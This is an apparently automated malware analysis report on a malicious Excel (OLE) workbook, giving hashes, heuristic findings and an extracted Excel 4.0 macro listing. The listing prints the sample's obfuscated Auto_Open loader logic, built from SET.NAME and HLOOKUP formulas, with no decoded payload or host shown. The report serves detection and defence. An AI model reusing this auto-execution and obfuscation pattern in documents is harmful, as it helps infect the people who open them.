Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02ef4553a6cc35be…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-27 11:37:38 Authoring application: Microsoft Excel First seen: 2021-01-11
MD5: 6d79fe75e628548cc43f180a9fbf5abc SHA-1: 59f475bcfc2fccd6002311e4f7a1b53ffe6a6f01 SHA-256: 02ef4553a6cc35bec40d0b3b2e4d3a5389de6c793c35990520cc21e9a732fd92
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6840 bytes
SHA-256: d209f1b186bd1dc818a714e1a5a6c229e2ea670e31dbc38b2c07158de5fd21a4
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  nIhItTrVF
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C147 
' 0018     22 LABEL : Cell Value, String Constant - chhERzI len=0 
' 0018     21 LABEL : Cell Value, String Constant - CPIgQR len=0 
' 0018     26 LABEL : Cell Value, String Constant - djwvdWUqThG len=0 
' 0018     27 LABEL : Cell Value, String Constant - dyDjcTyHueWR len=0 
' 0018     23 LABEL : Cell Value, String Constant - edspfppb len=0 
' 0018     24 LABEL : Cell Value, String Constant - EyRebbpZQ len=0 
' 0018     26 LABEL : Cell Value, String Constant - JGgwcjdJvux len=0 
' 0018     21 LABEL : Cell Value, String Constant - JHXfNc len=0 
' 0018     24 LABEL : Cell Value, String Constant - jvNDMsbln len=0 
' 0018     25 LABEL : Cell Value, String Constant - JyFJFBqMbs len=0 
' 0018     20 LABEL : Cell Value, String Constant - Kpxnx len=0 
' 0018     25 LABEL : Cell Value, String Constant - lniOETVnCh len=0 
' 0018     23 LABEL : Cell Value, String Constant - lppJPcjb len=0 
' 0018     26 LABEL : Cell Value, String Constant - qYACUpLqzcU len=0 
' 0018     26 LABEL : Cell Value, String Constant - RLMpoDUkrlY len=0 
' 0018     23 LABEL : Cell Value, String Constant - UgcTDhrj len=0 
' 0018     25 LABEL : Cell Value, String Constant - wWByoazrie len=0 
' 0018     26 LABEL : Cell Value, String Constant - YBuPfkvstSV len=0 
' 0018     27 LABEL : Cell Value, String Constant - YPXfJippdVOG len=0 
' 0018     27 LABEL : Cell Value, String Constant - zjqnJnEHHAco len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  nIhItTrVF,C57,"SET.NAME("JGgwcjdJvux",0+VALUE("0"))",""
'  nIhItTrVF,C59,"SET.NAME("chhERzI",JGgwcjdJvux)",""
'  nIhItTrVF,C62,"SET.NAME("Kpxnx",JGgwcjdJvux)",""
'  nIhItTrVF,S65,"",-731.00000000000000000000
'  nIhItTrVF,C66,"SET.NAME("jvNDMsbln",COUNTA(dyDjcTyHueWR))",""
'  nIhItTrVF,S66,"",143.00000000000000000000
'  nIhItTrVF,S67,"",780.00000000000000000000
'  nIhItTrVF,S68,"",-292.00000000000000000000
'  nIhItTrVF,C69,"SET.NAME("JHXfNc",COUNTA(EyRebbpZQ))",""
'  nIhItTrVF,S69,"",-49.00000000000000000000
'  nIhItTrVF,S70,"",386.00000000000000000000
'  nIhItTrVF,C72,[],""
'  nIhItTrVF,C77,"SET.NAME("YPXfJippdVOG","")",""
'  nIhItTrVF,C82,"chhERzI",""
'  nIhItTrVF,C84,"SET.NAME("lniOETVnCh",HLOOKUP("*",dyDjcTyHueWR,chhERzI,FALSE))",""
'  nIhItTrVF,C89,"UgcTDhrj",""
'  nIhItTrVF,C92,"SET.NAME("zjqnJnEHHAco",JGgwcjdJvux)",""
'  nIhItTrVF,C95,[],""
'  nIhItTrVF,C100,"zjqnJnEHHAco",""
'  nIhItTrVF,C105,"RLMpoDUkrlY",""
'  nIhItTrVF,C108,"edspfppb",""
'  nIhItTrVF,C111,"wWByoazrie",""
'  nIhItTrVF,C116,"SET.NAME("YBuPfkvstSV",VALUE(HLOOKUP("*",EyRebbpZQ,wWByoazrie,FALSE)))",""
'  nIhItTrVF,C119,"CPIgQR",""
'  nIhItTrVF,C123,"YPXfJippdVOG",""
'  nIhItTrVF,C126,"Kpxnx",""
'  nIhItTrVF,C128,NEXT(),""
'  nIhItTrVF,C132,"qYACUpLqzcU",""
'  nIhItTrVF,C135,[],""
'  nIhItTrVF,C138,"lppJPcjb",""
'  nIhItTrVF,C141,NEXT(),""
'  nIhItTrVF,C143,RETURN(),""
'  nIhItTrVF,C166,"SET.NAME("djwvdWUqThG",C57)",""
'  nIhItTrVF,C171,"dyDjcTyHueWR",""
'  nIhItTrVF,C173,"SET.NAME("EyRebbpZQ",R66C11)",""
'  nIhItTrVF,C178,"SET.NAME("lppJPcjb",187)",""
'  nIhItTrVF,C181,"SET.NAME("JyFJFBqMbs",3)",""
'  nIhItTrVF,C186,djwvdWUqThG(),""
'  nIhItTrVF,C187,HALT(),""